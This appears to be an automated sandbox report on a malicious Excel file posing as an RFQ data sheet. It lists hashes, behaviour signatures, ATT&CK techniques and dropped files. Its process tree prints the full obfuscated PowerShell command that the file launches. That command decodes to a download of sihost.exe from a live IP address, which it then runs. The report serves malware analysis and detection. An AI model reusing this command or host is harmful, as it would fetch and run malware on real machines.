bd60f3de34af2f263cd93e5456c777e0ced39dfc250f258f9029c266abc65144

Analysis

max time kernel
101s
max time network
113s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
13-08-2024 14:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RFQ Data Sheet Technical Specifications Conditioning System Package_PFD.xls
Size

327KB
MD5

cc61a84acf7b534e532fab431480c33c
SHA1

88b007d75f1f24d6001b9e9257dc97c800c78ba2
SHA256

9b1162db6e8c02d209e9de6803f5639e9994b2752efcdae10462b5cc008e8218
SHA512

2d7bbefb32432330080224c8a167321e1b89d777edbac30e8cb7bd396505b7fd03c316d89d0721b49ccded8d6ec1d9aa8879d0a58b520138a7e80018f412168f
SSDEEP

6144:IrwfU+iLch1FKYPEpAMcZ0MnADLVw0EAq6aQozyPpFSncaI2bnfjt4E:IrwaYZ1eAMcZD/rOmgUnfh4

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	Process
12	2668	mshta.exe
13	2668	mshta.exe
15	1020	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

Processes:

cmd.exepowershell.exe

pid	Process
2124	cmd.exe
1020	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exepowershell.execsc.execvtres.exeEXCEL.EXEmshta.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
1692	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid	Process
1020	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	1020	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXE

pid	Process
1692	EXCEL.EXE
1692	EXCEL.EXE
1692	EXCEL.EXE
1692	EXCEL.EXE
1692	EXCEL.EXE

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

mshta.execmd.exepowershell.execsc.exe

description	pid	Process	procid_target
PID 2668 wrote to memory of 2124	2668	mshta.exe	32
PID 2668 wrote to memory of 2124	2668	mshta.exe	32
PID 2668 wrote to memory of 2124	2668	mshta.exe	32
PID 2668 wrote to memory of 2124	2668	mshta.exe	32
PID 2124 wrote to memory of 1020	2124	cmd.exe	34
PID 2124 wrote to memory of 1020	2124	cmd.exe	34
PID 2124 wrote to memory of 1020	2124	cmd.exe	34
PID 2124 wrote to memory of 1020	2124	cmd.exe	34
PID 1020 wrote to memory of 2624	1020	powershell.exe	35
PID 1020 wrote to memory of 2624	1020	powershell.exe	35
PID 1020 wrote to memory of 2624	1020	powershell.exe	35
PID 1020 wrote to memory of 2624	1020	powershell.exe	35
PID 2624 wrote to memory of 2704	2624	csc.exe	36
PID 2624 wrote to memory of 2704	2624	csc.exe	36
PID 2624 wrote to memory of 2704	2624	csc.exe	36
PID 2624 wrote to memory of 2704	2624	csc.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\RFQ Data Sheet Technical Specifications Conditioning System Package_PFD.xls"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1692

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2668
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL.exe -ex byPass -NOp -w 1 -c DEVICecREdenTiaLdePLoyMeNT.Exe ; IeX($(IEX('[sYsteM.tExT.ENcOdinG]'+[ChAR]58+[char]58+'uTF8.GeTSTriNG([sYsTeM.convErT]'+[cHAR]58+[cHAr]0X3a+'FROmBAsE64stRInG('+[Char]0x22+'JFIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVSZEVGaU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUXFhTkh6SyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlRWVRNcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFB4LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpCc3BBZ2pwLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJscm9yIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcXlHbHRHdnBtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTcyLjMxLjEyNC8xMDIvc2lob3N0LmV4ZSIsIiRFTlY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO3NUYVJ0LVNMZWVwKDMpO1N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHNpaG9zdC5leGUi'+[CHar]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWeRSHElL.exe -ex byPass -NOp -w 1 -c DEVICecREdenTiaLdePLoyMeNT.Exe ; IeX($(IEX('[sYsteM.tExT.ENcOdinG]'+[ChAR]58+[char]58+'uTF8.GeTSTriNG([sYsTeM.convErT]'+[cHAR]58+[cHAr]0X3a+'FROmBAsE64stRInG('+[Char]0x22+'JFIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVSZEVGaU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUXFhTkh6SyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlRWVRNcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFB4LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpCc3BBZ2pwLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJscm9yIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcXlHbHRHdnBtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTcyLjMxLjEyNC8xMDIvc2lob3N0LmV4ZSIsIiRFTlY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO3NUYVJ0LVNMZWVwKDMpO1N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHNpaG9zdC5leGUi'+[CHar]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1020
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aprxst35.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2624
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1C96.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1C95.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\06B88E7F787D0F8E872CC6C5E3EDE59C

Filesize
344B

MD5
9a6ab26a10dddbc558e03cd1752ae11b

SHA1
b898ed796eeb645627b10e13221e851aa6f0b095

SHA256
b9ed60f8f2b187d480ae021d696c44d9e2030783ba377a57965e70bd9ff42abe

SHA512
9119bd9f375525d818d482edb168fca359342ae43efe6348adac51002f6fcd1eb02497eba98337bd478ac7950e82a378de2b252a9f9fa6f16901206be4335fb4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\06B88E7F787D0F8E872CC6C5E3EDE59C

Filesize
540B

MD5
5de53f4a295f90e8eb642baab06f3f5f

SHA1
328ee5d389cffc047f4f5c5c0a0302057b1e1513

SHA256
a818ebe5aaa8ce47075723b4941ceeb1a46f1c5b806c3fe22cc953cc8864edd9

SHA512
6884d1de21900803548c99fa80820f95245ce8677707a9bca63bf8dc393aaefef4edd353de2357d681cb3044fceb784a47aa725ee8c402effc0abe2d46378245

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
a582529b83f614895bbfa998a0ef8008

SHA1
fed6ad95e024414dd6947fd7a42755ba347cde94

SHA256
f1be172d7aa2b7a5d24634781e938596b412654cd23e8a444750d5b2cd41d30d

SHA512
d8f3534d508acffa9a69efb781379e3d48cedbcc8cd36d20b9a8f29317f8f3aca8cc9e01531a3c9950e1e51f05db9dd23e55721eeed6f895543bff2d736145c2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5837e7d45fddff6a8e84b87d45d8d584

SHA1
8f1b537929c96931c05034303e47b877c1cd84a7

SHA256
1c726cacda3ffa9dff8224da4547c09894a328e021f3dff0b16a0e84bcdcc7b6

SHA512
7fb43df825ecaa9ebf3092d8dcb871fa92377bdb69233ce1bf932ff992d5f6ae23ce24e064295ba20b099d1e3e48bb8fe88764858beac0e35255edef3075c8ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\102[1].hta

Filesize
1KB

MD5
b64748a3ff19a3a41dda0a24479feba1

SHA1
214f99e54f9c4ca82c58533ec0f19372c4ff5a0d

SHA256
2486cf9eb49712339f41e705da644a9b116e1df5a24727f53feed08239ebf6c3

SHA512
f1d189ed38fea97d5e83b3cfc7c2847e079f4933582b440c4f80ab1b8f327e4d6bc7bb8cc53463a765577789c3282157e666be82d260237708e2f1e787f1d286

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab114F.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1C96.tmp

Filesize
1KB

MD5
00a3a46203d25d88ce753c68cff1d7e0

SHA1
eb5fd2b677f7a4bb54205ea8dabbd020827acf3b

SHA256
72cf2e3cea8bdd25a2f4bbb6759bd4622a4f762e623fd6d5bd65e3e2ba92ab2e

SHA512
965053fa055b965c6be3eebac50ddec8bd4681671d1e36294db7f68cff49c15992ea6234901f737a75f85bc04ae2fed68fc9bd280c02644e861dac0c2c23b161

Download Submit
C:\Users\Admin\AppData\Local\Temp\aprxst35.dll

Filesize
3KB

MD5
6a11a5974d903d8d24ce0988479895fe

SHA1
ff201a474f6abc1a3cdbd70b48fc9fc3b9f07d87

SHA256
6b3fe37cbbcf2ab4476b74c3307ea96984e6e0d159adb32e5f61940641cf26fa

SHA512
ba0a3bdf0752f60e9d63354d133902570e13d25b65408c78cfff3c2bff1ac8789e3ec10912be2b207882c37eeadf73ecc4ea873abff4f6e64407d4cd779811d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\aprxst35.pdb

Filesize
7KB

MD5
385a8c83b40ed2ab0cda902de993b227

SHA1
af7428498d7cc6c21f94710b489d89d64364719e

SHA256
67e51ea30d289f56c485faecb4c4259899da8d1a729474b23b1ae5135b36d72c

SHA512
05a7ec570aa3a65326e3a517f694cf214d4f29a43e6b03061a3eaddf15f37538cb8525cb3f793b53600d8670df32e8f47ee8cbb7b988548584bb830aedb6454d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\D9PNR5HD.txt

Filesize
73B

MD5
521e5709ed4eda8034023be07e5cf95a

SHA1
3f4f6a540848058fb9798e152e8ea0666b11b13a

SHA256
af7cef459a4e6001f46b565bfd8c47a1832912cc37d2452d26c59b66f03f425c

SHA512
b3e625fdd2542937fdb37257675800baa5861fefb719fb89606bd494e4f78ad5b404486b1e4823fe51dd5cc5fae2ca9cc4f1e025e770586538c6aa81ed19c01b

Download Submit
C:\Users\Admin\AppData\Roaming\sihost.exe

Filesize
77KB

MD5
266650595fa3336cd5a32d5a358b0c20

SHA1
0c796d03911dc58e9c5b86ef005ce0ac0b18ddf0

SHA256
65fa7a5f70adf48536779bbe2f36a1428e0f7148fb11d2c2dfa2227e0954687a

SHA512
8110f4169d80753ed71c8f0b16b7b9d0446a56215ec95eca0a5f39a5681620435ca35a702dc608f51dd6ce31dc3843e17dc05089f799b1c98a73c65843d804e3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1C95.tmp

Filesize
652B

MD5
f3ccca29599d021d4d9e6e118c62fe2e

SHA1
c98dc2ed28164cc6222ba5180e837366d0b952d4

SHA256
55baac295103bc1ec22e506583b80c7e3e942d6227b0764ea7601bdc74a06d36

SHA512
a4fa10fa0b1a594b67107a48635f7c9a5188b2b00b5ae434fc4ac6414588c15508f24d988b45848caeac0134da23bec4ffe2465413fd562613258a52be1b9138

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aprxst35.0.cs

Filesize
469B

MD5
57220b2eeaa41382314518f6265ca367

SHA1
9f06731273d30bacf322b5b172c7c2a59752cc9f

SHA256
9b0c8ed3b425ff96fe8505490b3721b4d255e45c4a7972fa9bd75868603139dd

SHA512
4999993df5eff3acee817c7883ac6ce61bb1ec801f7f4d512485713d96c76bf9a140400c75f17eb169c201170e4d1cc72b8ff4f17fdf3c9abe24443b83256658

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aprxst35.cmdline

Filesize
309B

MD5
548d64ac687e8add8376640b6c7dcde9

SHA1
266e40dcb90f6f10b6023f7a3bae341216b2af69

SHA256
3d4a398baa6988a29f335cfe5cc18a8881bcd3b6e020ac0d0663993f7c8a47a9

SHA512
d4129390ceabaa235348109f5404d4221f0e3a9998963447bc6b5e7ddea91819a668bc09f317e28a5b9b97692fc6fe7a2b391a9bee7ba6a4b1039783075bf433

Download Submit
memory/1692-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1692-1-0x000000007265D000-0x0000000072668000-memory.dmp

Filesize
44KB

Download
memory/1692-56-0x000000007265D000-0x0000000072668000-memory.dmp

Filesize
44KB

Download
memory/1692-20-0x0000000003090000-0x0000000003092000-memory.dmp

Filesize
8KB

Download
memory/1692-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1692-68-0x000000007265D000-0x0000000072668000-memory.dmp

Filesize
44KB

Download
memory/2668-19-0x0000000002920000-0x0000000002922000-memory.dmp

Filesize
8KB

Download